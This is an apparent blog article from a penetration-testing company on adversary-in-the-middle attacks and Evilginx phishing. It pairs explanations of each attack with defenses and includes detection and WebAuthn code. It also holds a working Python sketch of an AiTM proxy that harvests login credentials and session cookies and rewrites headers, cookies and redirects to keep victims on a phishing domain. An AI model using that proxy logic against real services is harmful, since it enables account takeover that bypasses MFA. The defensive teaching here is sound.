As an offensive security company, we want to ensure our clients are aware of all the attack avenues used in Adversary-in-the-Middle (AiTM) attacks. In this article, we'll explore what AiTM attacks are and how you can protect your business from these types of attacks.
What Are Adversary-In-The-Middle Attacks?
An adversary-in-the-middle (AiTM) attack, still widely called a man-in-the-middle (MITM) attack, occurs when an attacker secretly intercepts and possibly alters the communication between two parties who believe they are communicating directly with each other. This type of attack can be extremely harmful: it lets the attacker eavesdrop on sensitive information or manipulate messages without either party noticing. Common variants include the following:
1. Eavesdropping and Passive MITM Attacks
Wi-Fi Eavesdropping: Attackers set up rogue Wi-Fi access points (often an "evil twin" of a trusted network name) to intercept communication on unsecured networks. Users connected to these networks unknowingly route their traffic through the attacker, who can read anything not protected by TLS or a VPN.
Packet Sniffing: Using tools like Wireshark or tcpdump, attackers capture unencrypted data packets travelling over a network they have access to, allowing them to analyze sensitive information such as plaintext credentials and session tokens.
2. Session Hijacking
Cookie Theft: Attackers intercept session cookies from an unprotected session (often using packet sniffing) and then present these cookies to impersonate the victim. This works against sessions carried over plain HTTP, or cookies that lack the Secure flag and are therefore also sent on any HTTP request to the same site.
SSL Stripping: Attackers downgrade a secure HTTPS connection to HTTP, keeping the victim on an insecure connection while the attacker talks HTTPS to the real server. Tools like sslstrip automate this by rewriting HTTPS links and redirects to HTTP. The attack depends on the victim's first request being plain HTTP; HTTP Strict Transport Security (HSTS), and especially the browser preload list, removes that opportunity.
3. DNS Spoofing
DNS Cache Poisoning: Attackers inject forged DNS responses into a resolver's cache so that a legitimate hostname resolves to an attacker-controlled address, redirecting users to malicious sites while they believe they are accessing legitimate resources (e.g., fake banking or login pages).
Pharming: Redirects users to malicious websites by tampering with name resolution, whether through a poisoned resolver, a compromised router's DNS settings, or an edited hosts file on the victim's machine, tricking them into divulging sensitive information or credentials.
4. ARP Spoofing
ARP Poisoning: Attackers send falsified ARP messages to a local network, associating their MAC address with the IP address of a legitimate device (such as the default gateway). This allows attackers to intercept and manipulate data flowing between the victim and the intended device.
Tools like Ettercap or Cain & Abel can automate ARP spoofing and facilitate MITM attacks, allowing attackers to monitor or alter the network traffic.
5. HTTPS Spoofing and SSL/TLS Downgrade Attacks
Certificate Spoofing: Attackers present a forged or self-signed certificate to the victim, relying on the user clicking through the browser warning, or they first get a rogue CA trusted on the device (via malware or an abused corporate root), in which case no warning appears. Either way the user believes the connection is secure while the attacker decrypts and re-encrypts all communication.
Protocol Downgrade Attacks (e.g., POODLE): Attackers force a connection to fall back to an older, weaker protocol version (POODLE targeted SSL 3.0) whose flaws make it possible to decrypt parts of the traffic. Disabling legacy protocol versions on both servers and clients removes this avenue, and TLS 1.3 adds explicit downgrade protection in the server's handshake random.
6. Email Hijacking and Phishing
Email MITM Attacks: Attackers intercept email communication, often using phishing tactics to gain login credentials and access private exchanges. They may then impersonate one party, redirect payments, or extract sensitive data.
BEC (Business Email Compromise):Â Attackers gain access to executive emails and redirect wire transfers or sensitive communications to their own accounts.
7. Man-in-the-Browser (MITB)
Malware Injection in Browsers: Attackers infect a user’s browser with malware or malicious extensions, allowing them to intercept and alter communications directly within the browser. This is often used to manipulate online banking sessions.
Keylogging and Form Grabbing: Malicious code records keystrokes or captures form submissions before they’re encrypted, allowing attackers to steal login credentials and other sensitive data.
Phishing involves the attacker sending a fraudulent email or message that appears to come from a legitimate source. The message contains a link to a fake website that looks like the target site, where the user is prompted to enter their login credentials.
In the AiTM variant of phishing the fake website is not a static copy: it is a reverse proxy, such as Evilginx, that relays every request to the real site and every response back to the victim. When the user enters their credentials and completes the MFA prompt, the proxy sees the credentials in transit and, more importantly, the session cookie the real site issues after a successful login. With this cookie the attacker can access the user's account without ever being asked for a second factor, because the session is already authenticated.
How Evilginx Works
Reverse Proxy Setup: Evilginx acts as a man-in-the-middle by creating a phishing link that mirrors a legitimate site (e.g., Gmail, Facebook, or corporate portals). When the victim clicks this link, Evilginx forwards requests to the legitimate website, proxying the traffic between the user and the authentic service.
Credential and Cookie Capture: Since Evilginx relays data between the user and the legitimate site, it can capture credentials (username and password) entered by the user. Additionally, it can grab session cookies after the user successfully authenticates, bypassing MFA protections.
Session Hijacking: With the captured session cookies, attackers can hijack the victim's session. This enables them to log in to the victim's account from a separate device, circumventing MFA because they are using the authenticated session rather than re-entering credentials.
Key Features and Capabilities of Evilginx
Phishing Beyond Credentials: Unlike traditional phishing, Evilginx captures not only usernames and passwords but also session cookies. This allows attackers to bypass MFA.
Real-Time Attack: Evilginx operates in real time, interacting with the legitimate website and the victim simultaneously, so any additional authentication step the real site imposes (a one-time code, a push approval, a consent screen) is simply relayed to the victim, who completes it on the attacker's behalf.
Customizable Phishlets: Evilginx uses "phishlets," which are configuration files designed for specific websites. These files define how Evilginx interacts with each targeted website, allowing attackers to build customized, highly convincing phishing pages that appear almost identical to legitimate sites.
TLS Support: Evilginx serves the phishing page over HTTPS with a certificate that is valid for the phishing domain (it can obtain one automatically from a public CA), so the browser shows the normal padlock and no warning. The only visible difference from the real site is the hostname in the address bar.
Example Attack Scenario Using Evilginx
Preparation: The attacker configures a phishing URL using Evilginx, with a phishlet customized for a specific target, such as a corporate login portal or a popular web service like Office 365.
Phishing: The attacker sends the phishing URL to the victim via email, SMS, or social engineering methods.
Victim Login: The victim clicks the link, enters credentials and completes whatever MFA prompt the real service issues, since the prompt itself is relayed through the proxy.
Credential and Session Capture: Evilginx records the credentials as they pass through the proxy and, once the real site responds with an authenticated session, the session cookies it sets.
Session Hijack: Using the captured session cookie, the attacker logs in as the victim without entering credentials or a second factor, because the session is already authenticated.
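To make the proxying concrete, here is an added example (written for this article, not Evilginx code) of the rewriting an AiTM proxy performs on each request and response: the Host, Origin and Referer headers are re-pointed at the real site, credential fields are harvested from the login POST, session cookies from Set-Cookie are recorded and re-scoped to the phishing domain, and redirects and links are rewritten so the victim never leaves the proxy. The hostnames, cookie names and form field names are hypothetical stand-ins for what a phishlet declares for a real target, and the sample exchange is constructed.

```python
"""Header/cookie rewriting at the core of an Evilginx-style AiTM proxy.

Added illustration, not Evilginx code. The hostnames, cookie names and form
field names are hypothetical; a phishlet supplies the real ones per target.
"""
import re
from urllib.parse import parse_qs

PHISH_HOST = "login.example-portal.test"  # attacker-controlled (hypothetical)
REAL_HOST = "login.example.com"           # impersonated service (hypothetical)
AUTH_COOKIES = {"SESSID", "auth_token"}   # cookies the phishlet marks as session tokens
CRED_FIELDS = ("username", "password")    # form fields the phishlet marks as credentials


def rewrite_request(headers: dict, body: str, captured: dict) -> tuple:
    """Victim -> proxy -> real site: re-point Host/Origin/Referer, harvest credentials."""
    out = {}
    content_type = ""
    for name, value in headers.items():
        lname = name.lower()
        if lname == "accept-encoding":
            continue  # force an uncompressed response so the body can be rewritten
        if lname == "host":
            value = REAL_HOST
        elif lname in ("origin", "referer"):
            value = value.replace(PHISH_HOST, REAL_HOST)
        elif lname == "content-type":
            content_type = value
        out[name] = value
    if content_type.startswith("application/x-www-form-urlencoded"):
        form = parse_qs(body)
        for field in CRED_FIELDS:
            if field in form:
                captured[field] = form[field][0]  # credentials pass through in the clear
    return out, body


def rewrite_response(headers: list, body: str, captured: dict) -> tuple:
    """Real site -> proxy -> victim: harvest auth cookies, re-scope them, rewrite links."""
    out = []
    for name, value in headers:
        lname = name.lower()
        if lname == "set-cookie":
            cookie_name, _, rest = value.partition("=")
            if cookie_name.strip() in AUTH_COOKIES:
                captured.setdefault("cookies", {})[cookie_name.strip()] = rest.split(";", 1)[0]
            # the victim's browser only accepts a Domain attribute matching the host it
            # talked to, so the cookie is re-scoped to the phishing domain
            value = re.sub(r";\s*Domain=[^;]*", f"; Domain={PHISH_HOST}", value, flags=re.IGNORECASE)
        elif lname == "location":
            value = value.replace(REAL_HOST, PHISH_HOST)  # keep redirects inside the proxy
        elif lname == "content-security-policy":
            continue  # would block the mirrored page from loading its own resources
        out.append((name, value))
    return out, body.replace(REAL_HOST, PHISH_HOST)


def replay_cookie_header(captured: dict) -> str:
    """Cookie header the attacker sends to the real site to resume the victim's session."""
    return "; ".join(f"{k}={v}" for k, v in captured.get("cookies", {}).items())


def demo() -> dict:
    """Run one constructed login exchange through both directions; returns what was captured."""
    captured = {}
    req_headers = {"Host": PHISH_HOST, "Origin": f"https://{PHISH_HOST}",
                   "Content-Type": "application/x-www-form-urlencoded", "Accept-Encoding": "gzip"}
    fwd_headers, _ = rewrite_request(req_headers, "username=alice&password=hunter2&mfa=482913", captured)
    resp_headers = [("Set-Cookie", "SESSID=abc123; Domain=.example.com; Secure; HttpOnly"),
                    ("Set-Cookie", "lang=en; Path=/"),
                    ("Location", f"https://{REAL_HOST}/home"),
                    ("Content-Security-Policy", "default-src 'self'")]
    vic_headers, vic_body = rewrite_response(resp_headers, f'<a href="https://{REAL_HOST}/logout">', captured)
    captured["forwarded_host"] = fwd_headers["Host"]
    captured["victim_headers"] = vic_headers
    captured["victim_body"] = vic_body
    captured["replay_cookie"] = replay_cookie_header(captured)
    return captured


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Note that the one-time code in the constructed POST is relayed unchanged: the proxy does not need to defeat the second factor, it only needs the cookie the real site sets once the victim has completed it.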
Detection and Defense Against Evilginx
Defending against Evilginx and similar advanced phishing techniques requires proactive security measures:
Phishing-Resistant MFA with FIDO2: Using FIDO2/WebAuthn authenticators (hardware tokens such as YubiKey, or platform passkeys) stops Evilginx from obtaining a usable session. Unlike SMS codes, TOTP or push approvals, which a victim can complete on the proxied page, a FIDO2 assertion is bound to the origin the browser is actually on: the browser writes that origin into the signed data and the credential is scoped to the real site's RP ID, so an assertion produced on the phishing domain is rejected by the real service and cannot be relayed.
User Education: Training users to recognize suspicious URLs and warning signs of phishing attacks is critical. Encourage users to verify URLs carefully and avoid clicking links from unexpected or unverified sources.
Domain Monitoring: Regularly monitor for similar or lookalike domains that might be used to trick employees into entering credentials on a fake login page.
Adaptive Session Management: Use adaptive or risk-based session monitoring to detect unusual login and session behaviour, such as a session cookie suddenly used from a new device, location, IP address or user agent, even if the cookie itself is valid. Where the platform supports it, bind sessions to the device that authenticated so that a copied cookie is worthless elsewhere.
Implement Zero Trust: Adopting a Zero Trust architecture requires continual verification of users, devices, and access privileges, even for authenticated sessions, which can help detect and mitigate the impact of session hijacking.
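The adaptive session management item above reduces to one concrete detection: a session cookie used from a source address and browser that never completed a login. Below is an added example (not from the original article) that runs that logic over a constructed application access log in JSON-lines form; the field names, the documentation-range IP addresses and the 30-minute window are assumptions to tune per environment.

```python
"""Detecting replay of a stolen session cookie from application access logs.

Added example, not from the original page. The log lines are constructed; the
field names and the 30-minute window are assumptions to tune per environment.
"""
import json
from datetime import datetime, timedelta

# Constructed JSON-lines access log: a victim logs in, then the same session id is
# used minutes later from a different address and browser that never authenticated.
SAMPLE_LOG = """\
{"ts": "2024-05-02T09:12:04Z", "user": "alice", "sid": "sess-7f3a", "ip": "203.0.113.10", "ua": "Chrome/124 (Windows)", "event": "login_success"}
{"ts": "2024-05-02T09:12:09Z", "user": "alice", "sid": "sess-7f3a", "ip": "203.0.113.10", "ua": "Chrome/124 (Windows)", "event": "GET /inbox"}
{"ts": "2024-05-02T09:14:34Z", "user": "alice", "sid": "sess-7f3a", "ip": "198.51.100.7", "ua": "Firefox/125 (Linux)", "event": "GET /inbox"}
{"ts": "2024-05-02T09:15:02Z", "user": "alice", "sid": "sess-7f3a", "ip": "198.51.100.7", "ua": "Firefox/125 (Linux)", "event": "POST /settings/forwarding"}
{"ts": "2024-05-02T10:00:00Z", "user": "bob", "sid": "sess-c21e", "ip": "203.0.113.22", "ua": "Safari/17 (macOS)", "event": "login_success"}
{"ts": "2024-05-02T10:05:00Z", "user": "bob", "sid": "sess-c21e", "ip": "203.0.113.22", "ua": "Safari/17 (macOS)", "event": "GET /inbox"}
"""

REPLAY_WINDOW = timedelta(minutes=30)  # assumption: cookie used elsewhere this soon after login


def parse_log(text: str) -> list:
    """Parse JSON lines into records sorted by timestamp."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ")
        records.append(rec)
    return sorted(records, key=lambda r: r["ts"])


def detect_cookie_replay(records: list) -> list:
    """Flag any session id used from a source (ip, user agent) that never completed a login.

    An AiTM proxy hands the attacker a cookie that is already authenticated, so the
    attacker's requests arrive with a valid session but with no login_success from
    their address. One alert per (session, source) pair.
    """
    logins = {}   # sid -> the login record that minted the session
    alerts, seen = [], set()
    for rec in records:
        if rec["event"] == "login_success":
            logins[rec["sid"]] = rec
            continue
        login = logins.get(rec["sid"])
        if login is None:
            continue  # session predates the log window; nothing to compare against
        ip_changed = rec["ip"] != login["ip"]
        ua_changed = rec["ua"] != login["ua"]
        if not (ip_changed or ua_changed):
            continue
        key = (rec["sid"], rec["ip"], rec["ua"])
        if key in seen:
            continue
        seen.add(key)
        age = rec["ts"] - login["ts"]
        alerts.append({
            "user": rec["user"], "sid": rec["sid"],
            "login_ip": login["ip"], "src_ip": rec["ip"],
            "ua_changed": ua_changed,
            "minutes_after_login": round(age.total_seconds() / 60, 1),
            # both ip and ua changing soon after login is the Evilginx replay shape
            "severity": "high" if (ip_changed and ua_changed and age <= REPLAY_WINDOW) else "medium",
            "first_event": rec["event"],
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_cookie_replay(parse_log(SAMPLE_LOG)):
        print(alert)
```

In production the IP comparison should be done at the ASN or geolocation level rather than on the raw address (mobile users change addresses constantly), and the first_event field is worth keeping: a new source whose first action is changing mail forwarding rules is the classic BEC follow-on.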
Protecting Against Adversary-In-The-Middle Attacks
To protect against these attacks, it's important to educate employees on how to identify phishing attempts and avoid clicking on suspicious links. Companies should also implement robust security controls such as phishing-resistant MFA, strong password policies, and regular security assessments to identify potential vulnerabilities before an attacker does.
Defensive Strategies Against MITM Attacks
End-to-End Encryption: Encrypting data from source to destination, especially over untrusted networks, does not stop an attacker from capturing traffic, but it ensures that what they capture cannot be read or altered undetected.
Mutual Authentication: Using protocols like TLS with mutual (client-certificate) authentication ensures both parties authenticate each other, making it harder for attackers to impersonate either side; a proxy that does not hold the client's private key cannot complete the handshake.
Certificate Transparency and Pinning: Monitoring Certificate Transparency logs for certificates issued for your domains detects mis-issued or attacker-obtained certificates. Browser-side HTTP Public Key Pinning (HPKP) has been retired by the major browsers, but pinning remains useful in mobile apps and other clients you control.
DNS Security Extensions (DNSSEC): DNSSEC authenticates DNS responses, reducing the risk of DNS spoofing and cache poisoning, provided the resolver actually validates the signatures.
Two-Factor Authentication (2FA): Adds a second layer of verification, making it harder for attackers to use stolen passwords on their own. Note that code- and push-based second factors are relayed by AiTM proxies such as Evilginx, so only phishing-resistant methods (FIDO2/WebAuthn) hold up against the attacks described above.
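The reason the FIDO2 recommendation in the Evilginx defenses and the caveat on the 2FA item hold is worth seeing in code. The following added example (not the article's own code) implements the relying-party checks that precede signature verification of a WebAuthn assertion and runs the same credential and challenge once from the real origin and once from an AiTM proxy's origin; the RP ID, origins and challenge are hypothetical, and verifying the signature over the returned payload is left to a WebAuthn library.

```python
"""Why FIDO2/WebAuthn survives an AiTM proxy: the assertion is bound to the origin.

Added illustration, not the page's own code. RP ID, origins and challenge are
hypothetical; signature verification over the returned payload is left to a
real library (the credential's public key is not modelled here).
"""
import base64
import hashlib
import json
import struct

RP_ID = "example.com"                               # relying party ID the service registered (assumption)
EXPECTED_ORIGIN = "https://login.example.com"       # the only origin the service accepts
PHISH_ORIGIN = "https://login.example-portal.test"  # the AiTM proxy's origin (hypothetical)
FLAG_USER_PRESENT = 0x01


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def build_authenticator_data(rp_id: str, sign_count: int, flags: int = FLAG_USER_PRESENT) -> bytes:
    """authenticatorData layout: rpIdHash(32) | flags(1) | signCount(4, big-endian)."""
    return hashlib.sha256(rp_id.encode()).digest() + bytes([flags]) + struct.pack(">I", sign_count)


def build_client_data(origin: str, challenge: bytes) -> bytes:
    """The browser writes clientDataJSON itself, with the origin the page actually loaded from;
    the authenticator signs over its hash, so a proxy cannot rewrite it afterwards."""
    return json.dumps({"type": "webauthn.get", "challenge": b64url(challenge), "origin": origin}).encode()


def verify_assertion(client_data_json: bytes, authenticator_data: bytes, expected_challenge: bytes,
                     expected_origin: str = EXPECTED_ORIGIN, rp_id: str = RP_ID) -> tuple:
    """Relying-party checks that precede signature verification (WebAuthn spec, section 7.2).
    Returns (ok, reason, signed_payload); signed_payload is authenticatorData || SHA-256(clientDataJSON),
    the exact bytes the credential's public key must verify."""
    try:
        cd = json.loads(client_data_json)
    except ValueError:
        return False, "clientDataJSON is not valid JSON", b""
    if cd.get("type") != "webauthn.get":
        return False, "wrong ceremony type", b""
    if cd.get("challenge") != b64url(expected_challenge):
        return False, "challenge mismatch (stale or replayed assertion)", b""
    if cd.get("origin") != expected_origin:
        return False, f"origin mismatch: {cd.get('origin')!r}", b""  # the AiTM case fails here
    if len(authenticator_data) < 37:
        return False, "authenticatorData too short", b""
    if authenticator_data[:32] != hashlib.sha256(rp_id.encode()).digest():
        return False, "rpIdHash mismatch (credential scoped to another RP ID)", b""
    if not authenticator_data[32] & FLAG_USER_PRESENT:
        return False, "user presence flag not set", b""
    return True, "ok", authenticator_data + hashlib.sha256(client_data_json).digest()


def aitm_comparison(challenge: bytes = b"\x11" * 32) -> dict:
    """Same user, same key, same challenge: once on the real site, once through a proxy."""
    legit = verify_assertion(build_client_data(EXPECTED_ORIGIN, challenge),
                             build_authenticator_data(RP_ID, 7), challenge)
    # Through the proxy the browser is on the phishing origin. An RP ID of example.com is not a
    # registrable suffix of that origin, so the browser refuses it; the best the proxy can do is
    # request its own RP ID, for which the authenticator holds no credential for this service.
    # Even if an assertion were somehow produced, the relying party rejects it as shown here.
    phished = verify_assertion(build_client_data(PHISH_ORIGIN, challenge),
                               build_authenticator_data("example-portal.test", 7), challenge)
    return {"legitimate": legit, "phished": phished}


if __name__ == "__main__":
    for case, (ok, reason, _) in aitm_comparison().items():
        print(f"{case}: {'accepted' if ok else 'rejected'} ({reason})")
```

Contrast this with a TOTP code or a push approval: nothing in those ties the second factor to the page the user is looking at, which is exactly why Evilginx can relay them.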
Achilleus's Social Engineering Solutions
As a penetration testing company, we can help our clients by simulating real-world AiTM attacks to identify weaknesses in their security infrastructure. This allows them to take proactive steps to secure their systems and protect against these types of attacks.
If you are interested in having a no-cost assessment performed, feel free to use the link below.
ABOUT ACHILLEUS
As a penetration testing company, we are a leading provider of comprehensive cybersecurity solutions for businesses of all sizes. Our innovative approach to security assessment and implementation ensures our clients get maximum protection against online threats so they can focus on their business without worrying about vulnerabilities.
With a team of highly knowledgeable experts at hand, we guarantee peace of mind with every solution built from experience and expertise!